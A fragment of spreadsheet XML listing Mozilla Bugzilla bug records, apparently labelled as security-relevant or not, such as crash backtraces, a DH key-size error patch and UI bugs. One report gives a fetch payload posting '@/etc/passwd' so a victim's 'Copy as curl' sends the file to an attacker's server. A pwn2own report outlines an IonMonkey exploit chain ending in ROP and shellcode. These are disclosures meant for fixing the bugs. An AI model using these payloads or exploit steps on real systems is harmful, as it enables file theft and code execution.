      <c r="T5966" t="n">
        <v>1</v>
      </c>
      <c r="U5966" t="n">
        <v>0</v>
      </c>
      <c r="V5966" t="n">
        <v>24</v>
      </c>
      <c r="W5966" t="inlineStr">
        <is>
          <t>Created attachment 465905
Add SSL_ERROR_WEAK_SERVER_KEY (checked in)
The proposed patch adds a new error code
SSL_ERROR_WEAK_SERVER_KEY for the dh_p size
check in ssl3_HandleServerKeyExchange.
Note that Firefox will display the string
    ssl_error_weak_server_key
in its error page. So the name of this error
code needs to be descriptive enough and needs
to make it clear the server is at fault.
We can consider adding a new error code for
invalid dh_g and dh_Ys parameters in the
same function.  Right now we use the default
SSL_ERROR_RX_MALFORMED_SERVER_KEY_EXCH, which
seems appropriate for invalid DH parameters.
Would SSL_ERROR_SERVER_KEY_EXCHANGE_FAILURE
be better?</t>
        </is>
      </c>
      <c r="X5966" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5967">
      <c r="A5967" t="n">
        <v>1614468</v>
      </c>
      <c r="B5967" t="inlineStr">
        <is>
          <t>2020-02-10 13:00:49 -0800</t>
        </is>
      </c>
      <c r="C5967" t="inlineStr">
        <is>
          <t>'Copy As Curl' in the network panel of the devtools uses '--data' instead of '--data-raw', leading to arbitrary local file access</t>
        </is>
      </c>
      <c r="D5967" t="inlineStr">
        <is>
          <t>2024-05-30 10:11:36 -0700</t>
        </is>
      </c>
      <c r="E5967" t="n">
        <v>1</v>
      </c>
      <c r="F5967" t="n">
        <v>1</v>
      </c>
      <c r="G5967" t="n">
        <v>3</v>
      </c>
      <c r="H5967" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5967" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J5967" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K5967" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5967" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5967" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5967" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5967" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5967" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [post-critsmash-triage][adv-main76+][adv-ESR68.8+]</t>
        </is>
      </c>
      <c r="Q5967" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5967" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5967" t="inlineStr">
        <is>
          <t>Firefox 77</t>
        </is>
      </c>
      <c r="T5967" t="n">
        <v>1</v>
      </c>
      <c r="U5967" t="n">
        <v>0</v>
      </c>
      <c r="V5967" t="n">
        <v>16</v>
      </c>
      <c r="W5967" t="inlineStr">
        <is>
          <t>Created attachment 9125643
bug.html
After the discussion about the patch for bug 1607742, I made a few more experiments with the "Copy as curl" functionality, and found another vulnerability : POST data is sent using '--data' instead of '--data-raw'. This means that if the body of an HTTP request starts with the character '@', the rest of the body will be interpreted as a file name to send instead of raw data.
An attacker can use this bug to read local files on the computer of an user of the "Copy as curl"  functionality. The only thing he has to do is making a request such as the following :
    fetch('', {body: '@/etc/passwd', method:'POST'})
When the user will use 'copy as curl' on the generated request, and then execute the curl command, the contents of /etc/passwd will be send to the attacker's server.
Fixing this bug is as simple as using --data-raw instead of --data.</t>
        </is>
      </c>
      <c r="X5967" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5968">
      <c r="A5968" t="n">
        <v>635235</v>
      </c>
      <c r="B5968" t="inlineStr">
        <is>
          <t>2011-02-18 07:10:44 -0800</t>
        </is>
      </c>
      <c r="C5968" t="inlineStr">
        <is>
          <t>Incorrect line number in e4x tokens leads to buffer overreads and possible crashes</t>
        </is>
      </c>
      <c r="D5968" t="inlineStr">
        <is>
          <t>2013-12-27 14:31:41 -0800</t>
        </is>
      </c>
      <c r="E5968" t="n">
        <v>1</v>
      </c>
      <c r="F5968" t="n">
        <v>1</v>
      </c>
      <c r="G5968" t="n">
        <v>3</v>
      </c>
      <c r="H5968" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5968" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5968" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5968" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5968" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5968" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5968" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5968" t="inlineStr">
        <is>
          <t>[ccbr][has patch][sg:moderate], fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q5968" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5968" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5968" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5968" t="n">
        <v>1</v>
      </c>
      <c r="U5968" t="n">
        <v>0</v>
      </c>
      <c r="V5968" t="n">
        <v>35</v>
      </c>
      <c r="W5968" t="inlineStr">
        <is>
          <t>Created attachment 513450
testcase
Attached testcase crashes both js debug and opt shell on TM changeset 0d4b01278890 without -m nor -j.
Nominating blocking2.0? and setting s-s because I have no idea what this is capable of. It seems to access a weird memory location at 0x1006627d6 in 64-bit.
This also reproduces in 32-bit.</t>
        </is>
      </c>
      <c r="X5968" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5969">
      <c r="A5969" t="n">
        <v>523816</v>
      </c>
      <c r="B5969" t="inlineStr">
        <is>
          <t>2009-10-22 05:52:29 -0700</t>
        </is>
      </c>
      <c r="C5969" t="inlineStr">
        <is>
          <t>valgrind - Invalid Write of size 1 in oggplay_data_handle_cmml_data</t>
        </is>
      </c>
      <c r="D5969" t="inlineStr">
        <is>
          <t>2010-01-24 10:24:54 -0800</t>
        </is>
      </c>
      <c r="E5969" t="n">
        <v>1</v>
      </c>
      <c r="F5969" t="n">
        <v>1</v>
      </c>
      <c r="G5969" t="n">
        <v>3</v>
      </c>
      <c r="H5969" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5969" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5969" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5969" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5969" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5969" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5969" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5969" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5969" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5969" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5969" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5969" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5969" t="n">
        <v>1</v>
      </c>
      <c r="U5969" t="n">
        <v>0</v>
      </c>
      <c r="V5969" t="n">
        <v>17</v>
      </c>
      <c r="W5969" t="inlineStr">
        <is>
          <t>valgrind mochitest linux mozilla-central. valgrind 3.2.1, built with
--enable-valgrind, not run with --smc-check=all
Invalid write of size 1 terminating record data string.
http://mxr.mozilla.org/mozilla-central/source/media/liboggplay/src/liboggplay/oggplay_data.c#391
Occurs after content/media/test/test_playback_errors.html
Invalid write of size 1
   at 0x71A4D35: oggplay_data_handle_cmml_data (oggplay_data.c:391)
   by 0x71A32C8: oggplay_callback_cmml (oggplay_callback.c:396)
   by 0x71B780C: oggz_read_sync (oggz_read.c:491)
   by 0x71B7C0A: oggz_read (oggz_read.c:612)
   by 0x71A23BA: oggplay_step_decoding (oggplay.c:744)
   by 0x71E7A2D: nsOggDecodeStateMachine::DecodeFrame() (nsOggDecoder.cpp:748)
   by 0x71E9F05: nsOggDecodeStateMachine::Run() (nsOggDecoder.cpp:1434)
   by 0x42FE99E: nsThread::ProcessNextEvent(int, int*) (nsThread.cpp:527)
   by 0x428607C: NS_ProcessNextEvent_P(nsIThread*, int) (nsThreadUtils.cpp:230)
   by 0x42FF4AF: nsThread::ThreadFunc(void*) (nsThread.cpp:254)
   by 0x439C261: _pt_root (ptthread.c:228)
   by 0x8FD49A: start_thread (in /lib/libpthread-2.5.so)
 Address 0x10E245F6 is 0 bytes after a block of size 62 alloc'd
   at 0x40046FF: calloc (vg_replace_malloc.c:279)
   by 0x71A4CD2: oggplay_data_handle_cmml_data (oggplay_data.c:378)
   by 0x71A32C8: oggplay_callback_cmml (oggplay_callback.c:396)
   by 0x71B780C: oggz_read_sync (oggz_read.c:491)
   by 0x71B7C0A: oggz_read (oggz_read.c:612)
   by 0x71A23BA: oggplay_step_decoding (oggplay.c:744)
   by 0x71E7A2D: nsOggDecodeStateMachine::DecodeFrame() (nsOggDecoder.cpp:748)
   by 0x71E9F05: nsOggDecodeStateMachine::Run() (nsOggDecoder.cpp:1434)
   by 0x42FE99E: nsThread::ProcessNextEvent(int, int*) (nsThread.cpp:527)
   by 0x428607C: NS_ProcessNextEvent_P(nsIThread*, int) (nsThreadUtils.cpp:230)
   by 0x42FF4AF: nsThread::ThreadFunc(void*) (nsThread.cpp:254)
   by 0x439C261: _pt_root (ptthread.c:228)</t>
        </is>
      </c>
      <c r="X5969" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5970">
      <c r="A5970" t="n">
        <v>304070</v>
      </c>
      <c r="B5970" t="inlineStr">
        <is>
          <t>2005-08-09 13:38:52 -0700</t>
        </is>
      </c>
      <c r="C5970" t="inlineStr">
        <is>
          <t>Mailing list archives aren't publically accessible</t>
        </is>
      </c>
      <c r="D5970" t="inlineStr">
        <is>
          <t>2021-06-02 10:49:21 -0700</t>
        </is>
      </c>
      <c r="E5970" t="n">
        <v>1</v>
      </c>
      <c r="F5970" t="n">
        <v>1</v>
      </c>
      <c r="G5970" t="n">
        <v>4</v>
      </c>
      <c r="H5970" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5970" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5970" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K5970" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5970" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5970" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5970" t="inlineStr">
        <is>
          <t>[blocker will fix]</t>
        </is>
      </c>
      <c r="Q5970" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5970" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5970" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5970" t="n">
        <v>1</v>
      </c>
      <c r="U5970" t="n">
        <v>0</v>
      </c>
      <c r="V5970" t="n">
        <v>5</v>
      </c>
      <c r="W5970" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.10) Gecko/20050725 Firefox/1.0.6 (Ubuntu package 1.0.6)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.10) Gecko/20050725 Firefox/1.0.6 (Ubuntu package 1.0.6)
The "Summary" hyperlink requests an email address, yet all I want to do is view
the mailing list archives.  Is this intended behaviour?  If so, it might be nice
if the page could explain why an email address is required.
Reproducible: Always
Steps to Reproduce:
1. Visit http://bugzilla.org/cgi-bin/mj_wwwusr?func=lists-long-full&amp;extra=developers
2. Click on the "Summary" hyperlink
Actual Results:  
Prompted for an email address
Expected Results:  
I expected to be taken to the mailing list archives.</t>
        </is>
      </c>
      <c r="X5970" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5971">
      <c r="A5971" t="n">
        <v>1208078</v>
      </c>
      <c r="B5971" t="inlineStr">
        <is>
          <t>2015-09-24 08:24:24 -0700</t>
        </is>
      </c>
      <c r="C5971" t="inlineStr">
        <is>
          <t>Dragging a tab in e10s windows shows an ugly tab preview/thumbnail (fully opaque, drop shadow, beveled borders)</t>
        </is>
      </c>
      <c r="D5971" t="inlineStr">
        <is>
          <t>2018-02-06 08:18:56 -0800</t>
        </is>
      </c>
      <c r="E5971" t="n">
        <v>1</v>
      </c>
      <c r="F5971" t="n">
        <v>1</v>
      </c>
      <c r="G5971" t="n">
        <v>2</v>
      </c>
      <c r="H5971" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5971" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5971" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K5971" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5971" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5971" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5971" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5971" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5971" t="inlineStr">
        <is>
          <t>[fce-active-legacy]</t>
        </is>
      </c>
      <c r="Q5971" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5971" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5971" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T5971" t="n">
        <v>1</v>
      </c>
      <c r="U5971" t="n">
        <v>0</v>
      </c>
      <c r="V5971" t="n">
        <v>21</v>
      </c>
      <c r="W5971" t="inlineStr">
        <is>
          <t>STR:
Drag a tab horizontally through the tabbar and look at the tab preview.
On non-e10s windows, the preview is translucent whereas on e10s the preview is opaque and has a drop shadow with beveled borders.
Looking around, this may be related to bug 1194311?
Seen on Windows 10 with HiDPI.</t>
        </is>
      </c>
      <c r="X5971" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5972">
      <c r="A5972" t="n">
        <v>504613</v>
      </c>
      <c r="B5972" t="inlineStr">
        <is>
          <t>2009-07-16 11:11:24 -0700</t>
        </is>
      </c>
      <c r="C5972" t="inlineStr">
        <is>
          <t>crash (segfault) @ oggplay_data_handle_theora_frame (memcpy) when playing corrupted ogg theora file</t>
        </is>
      </c>
      <c r="D5972" t="inlineStr">
        <is>
          <t>2010-05-29 17:40:30 -0700</t>
        </is>
      </c>
      <c r="E5972" t="n">
        <v>1</v>
      </c>
      <c r="F5972" t="n">
        <v>1</v>
      </c>
      <c r="G5972" t="n">
        <v>3</v>
      </c>
      <c r="H5972" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5972" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5972" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5972" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5972" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5972" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5972" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5972" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5972" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q5972" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5972" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5972" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5972" t="n">
        <v>1</v>
      </c>
      <c r="U5972" t="n">
        <v>0</v>
      </c>
      <c r="V5972" t="n">
        <v>19</v>
      </c>
      <c r="W5972" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Build Identifier: mozilla-central revision c121e64e9940
Segmentation fault when playing corrupted ogg theora file (attached).
Reproducible: Always
Steps to Reproduce:
1. Load attached file.
Actual Results:  
firefox crashes
Expected Results:  
some sort of "this file is corrupted" message
Backtrace from a program that uses the ogg libraries similarly to firefox (i.e. oggplayer):
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6e69b90 (LWP 31797)]
0xb7b45896 in memcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) backtrace
#0  0xb7b45896 in memcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x0930bfd8 in ?? ()
#2  0x08057449 in oggplay_callback_theora (oggz=0x929d200, op=0x930c128, 
    serialno=855307237, user_data=0x930bfd8) at oggplay_callback.c:201
#3  0x0805fdfd in oggz_read_deliver_packet (elem=0x930c128) at oggz_read.c:303
#4  0x080649b8 in oggz_dlist_deliter (dlist=0x929d440, 
    func=0x805fd00 &lt;oggz_read_deliver_packet&gt;) at oggz_dlist.c:183
#5  0x0806045f in oggz_read_sync (oggz=0x929d200) at oggz_read.c:462
#6  0x08060783 in oggz_read (oggz=0x929d200, n=8192) at oggz_read.c:606
#7  0x080555e6 in oggplay_step_decoding (me=0x929d040) at oggplay.c:691
#8  0x0804d04b in decode_thread (p=0xbfac0548) at oggplayer.cpp:313
#9  0xb7e2983b in ?? () from /usr/lib/libSDL-1.2.so.0
#10 0xb7e7771d in ?? () from /usr/lib/libSDL-1.2.so.0
#11 0xb7eb74ff in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#12 0xb7bb049e in clone () from /lib/tls/i686/cmov/libc.so.6</t>
        </is>
      </c>
      <c r="X5972" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5973">
      <c r="A5973" t="n">
        <v>473709</v>
      </c>
      <c r="B5973" t="inlineStr">
        <is>
          <t>2009-01-14 21:40:48 -0800</t>
        </is>
      </c>
      <c r="C5973" t="inlineStr">
        <is>
          <t>"Assertion failure: cursor == (uint8 *)copy-&gt;messageArgs[0] + argsCopySize, at jsexn.c" or "Assertion failure: cursor == (uint8 *)copy-&gt;messageArgs[0] + argsCopySize, at jsexn.cpp"</t>
        </is>
      </c>
      <c r="D5973" t="inlineStr">
        <is>
          <t>2009-03-29 09:28:31 -0700</t>
        </is>
      </c>
      <c r="E5973" t="n">
        <v>1</v>
      </c>
      <c r="F5973" t="n">
        <v>1</v>
      </c>
      <c r="G5973" t="n">
        <v>3</v>
      </c>
      <c r="H5973" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5973" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5973" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5973" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5973" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5973" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5973" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5973" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5973" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q5973" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5973" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5973" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5973" t="n">
        <v>1</v>
      </c>
      <c r="U5973" t="n">
        <v>0</v>
      </c>
      <c r="V5973" t="n">
        <v>30</v>
      </c>
      <c r="W5973" t="inlineStr">
        <is>
          <t>Created attachment 357094
linux gdb backtrace
function f() { eval("(function() { switch(x, x) { default: for(x2; &lt;x&gt;&lt;y/&gt;&lt;/x&gt;;) (function(){}) &lt;x&gt;&lt;y/&gt;&lt;/x&gt;;break; case (+&lt;&gt;&lt;x&gt;&lt;y/&gt;&lt;/x&gt;&lt;/&gt;): break;   }; })()"); }
gczeal(2);
f();
asserts debug js trunk shell (with and without -j) and 1.9.0.x debug js shell at Assertion failure: cursor == (uint8 *)copy-&gt;messageArgs[0] + argsCopySize, at ../jsexn.cpp:188
Compiling 1.9.0.x opt with gczeal seems to work as expected. Security-sensitive because it involves gczeal.
Thanks Waldo for guiding me along this one.</t>
        </is>
      </c>
      <c r="X5973" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5974">
      <c r="A5974" t="n">
        <v>665360</v>
      </c>
      <c r="B5974" t="inlineStr">
        <is>
          <t>2011-06-19 10:19:00 -0700</t>
        </is>
      </c>
      <c r="C5974" t="inlineStr">
        <is>
          <t>Crash [@ gfxMixedFontFamily::ReplaceFontEntry(gfxFontEntry*, gfxFontEntry*) ]</t>
        </is>
      </c>
      <c r="D5974" t="inlineStr">
        <is>
          <t>2015-10-16 11:37:38 -0700</t>
        </is>
      </c>
      <c r="E5974" t="n">
        <v>1</v>
      </c>
      <c r="F5974" t="n">
        <v>1</v>
      </c>
      <c r="G5974" t="n">
        <v>3</v>
      </c>
      <c r="H5974" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5974" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5974" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5974" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5974" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5974" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5974" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5974" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5974" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q5974" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5974" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5974" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T5974" t="n">
        <v>1</v>
      </c>
      <c r="U5974" t="n">
        <v>0</v>
      </c>
      <c r="V5974" t="n">
        <v>35</v>
      </c>
      <c r="W5974" t="inlineStr">
        <is>
          <t>1. http://www.eastoncycling.com/en-us/mountain/products/bars/all-mountain/ea70-mb-281 in Nightly on Windows XP
2. Crash
Ted's exploitable breakpad anaylyser gives this a high exploitability which actually matches the use of deleted memory.
+		this	0x097fc460 {mHdr=0xdddddddd }	const nsTArray_base&lt;nsTArrayDefaultAllocator&gt; * const
  // @return The number of elements in the array.
  size_type Length() const {
=&gt;    return mHdr-&gt;mLength;
  }
&gt;	xul.dll!nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length()  Line 140 + 0x5 bytes	C++
 	xul.dll!gfxMixedFontFamily::ReplaceFontEntry(gfxFontEntry * aOldFontEntry=0x097fc028, gfxFontEntry * aNewFontEntry=0x097f60c8)  Line 116 + 0xb bytes	C++
 	xul.dll!nsUserFontSet::ReplaceFontEntry(gfxProxyFontEntry * aProxy=0x097fc028, gfxFontEntry * aFontEntry=0x097f60c8)  Line 688	C++
 	xul.dll!gfxUserFontSet::OnLoadComplete(gfxProxyFontEntry * aProxy=0x097fc028, const unsigned char * aFontData=0x00000000, unsigned int aLength=21812, unsigned int aDownloadStatus=0)  Line 560	C++
 	xul.dll!nsFontFaceLoader::OnStreamComplete(nsIStreamLoader * aLoader=0x098ae110, nsISupports * aContext=0x00000000, unsigned int aStatus=0, unsigned int aStringLen=21812, const unsigned char * aString=0x0a0c6c00)  Line 220 + 0x20 bytes	C++
 	xul.dll!nsStreamLoader::OnStopRequest(nsIRequest * request=0x098ad8cc, nsISupports * ctxt=0x00000000, unsigned int aStatus=0)  Line 125 + 0x3e bytes	C++
 	xul.dll!nsCORSListenerProxy::OnStopRequest(nsIRequest * aRequest=0x098ad8cc, nsISupports * aContext=0x00000000, unsigned int aStatusCode=0)  Line 623	C++
I was able to reproduce the crash but not the deleted memory in debug Aurora.
I was not able to reproduce the crash in debug Beta.
I was not able to reproduce with nightly Nightly or Aurora builds.
This was found from crash automation from bp-5279a5dd-12aa-4dcc-bb1d-471152110616 which matches the detected crash.</t>
        </is>
      </c>
      <c r="X5974" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5975">
      <c r="A5975" t="n">
        <v>1537924</v>
      </c>
      <c r="B5975" t="inlineStr">
        <is>
          <t>2019-03-21 10:19:58 -0700</t>
        </is>
      </c>
      <c r="C5975" t="inlineStr">
        <is>
          <t>ZDI-CAN-8368 IonMonkey MArraySlice has incorrect alias information</t>
        </is>
      </c>
      <c r="D5975" t="inlineStr">
        <is>
          <t>2023-12-06 07:55:35 -0800</t>
        </is>
      </c>
      <c r="E5975" t="n">
        <v>1</v>
      </c>
      <c r="F5975" t="n">
        <v>1</v>
      </c>
      <c r="G5975" t="n">
        <v>3</v>
      </c>
      <c r="H5975" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5975" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5975" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5975" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5975" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5975" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5975" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5975" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5975" t="inlineStr">
        <is>
          <t>[jsbugmon:update,testComment=8,origRev=b2f1edb41241]</t>
        </is>
      </c>
      <c r="Q5975" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5975" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5975" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T5975" t="n">
        <v>1</v>
      </c>
      <c r="U5975" t="n">
        <v>0</v>
      </c>
      <c r="V5975" t="n">
        <v>32</v>
      </c>
      <c r="W5975" t="inlineStr">
        <is>
          <t>Created attachment 9052620
test.html
pwn2own 2019
Here is the JIT implementation of Array.slice:
```
  CompilerObject templateObj_;
  gc::InitialHeap initialHeap_;
  MArraySlice(MDefinition* obj, MDefinition* begin, MDefinition* end,
              JSObject* templateObj, gc::InitialHeap initialHeap)
      : MTernaryInstruction(classOpcode, obj, begin, end),
        templateObj_(templateObj),
        initialHeap_(initialHeap) {
    setResultType(MIRType::Object);
  }
 public:
  INSTRUCTION_HEADER(ArraySlice)
  TRIVIAL_NEW_WRAPPERS
  NAMED_OPERANDS((0, object), (1, begin), (2, end))
  JSObject* templateObj() const { return templateObj_; }
  gc::InitialHeap initialHeap() const { return initialHeap_; }
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
  }
  bool possiblyCalls() const override { return true; }
  bool appendRoots(MRootList&amp; roots) const override {
    return roots.append(templateObj_);
  }
```
This states that Array.sice does not have side effects, but actually they can be triggered via Symbol.species.
We execute JS that shortens the Array to cause OOB writes later on.
We spray TypedArrays and overwrite a length to gain arb r/w.
We then ROP to execute our shellcode.</t>
        </is>
      </c>
      <c r="X5975" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5976">
      <c r="A5976" t="n">
        <v>451898</v>
      </c>
      <c r="B5976" t="inlineStr">
        <is>
          <t>2008-08-23 17:24:30 -0700</t>
        </is>
      </c>
      <c r="C5976" t="inlineStr">
        <is>
          <t>URL spoofing bug involving Firefox's error pages and document.write</t>
        </is>
      </c>
      <c r="D5976" t="inlineStr">
        <is>
          <t>2010-01-26 07:51:40 -0800</t>
        </is>
      </c>
      <c r="E5976" t="n">
        <v>1</v>
      </c>
      <c r="F5976" t="n">
        <v>1</v>
      </c>
      <c r="G5976" t="n">
        <v>3</v>
      </c>
      <c r="H5976" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5976" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5976" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5976" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5976" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
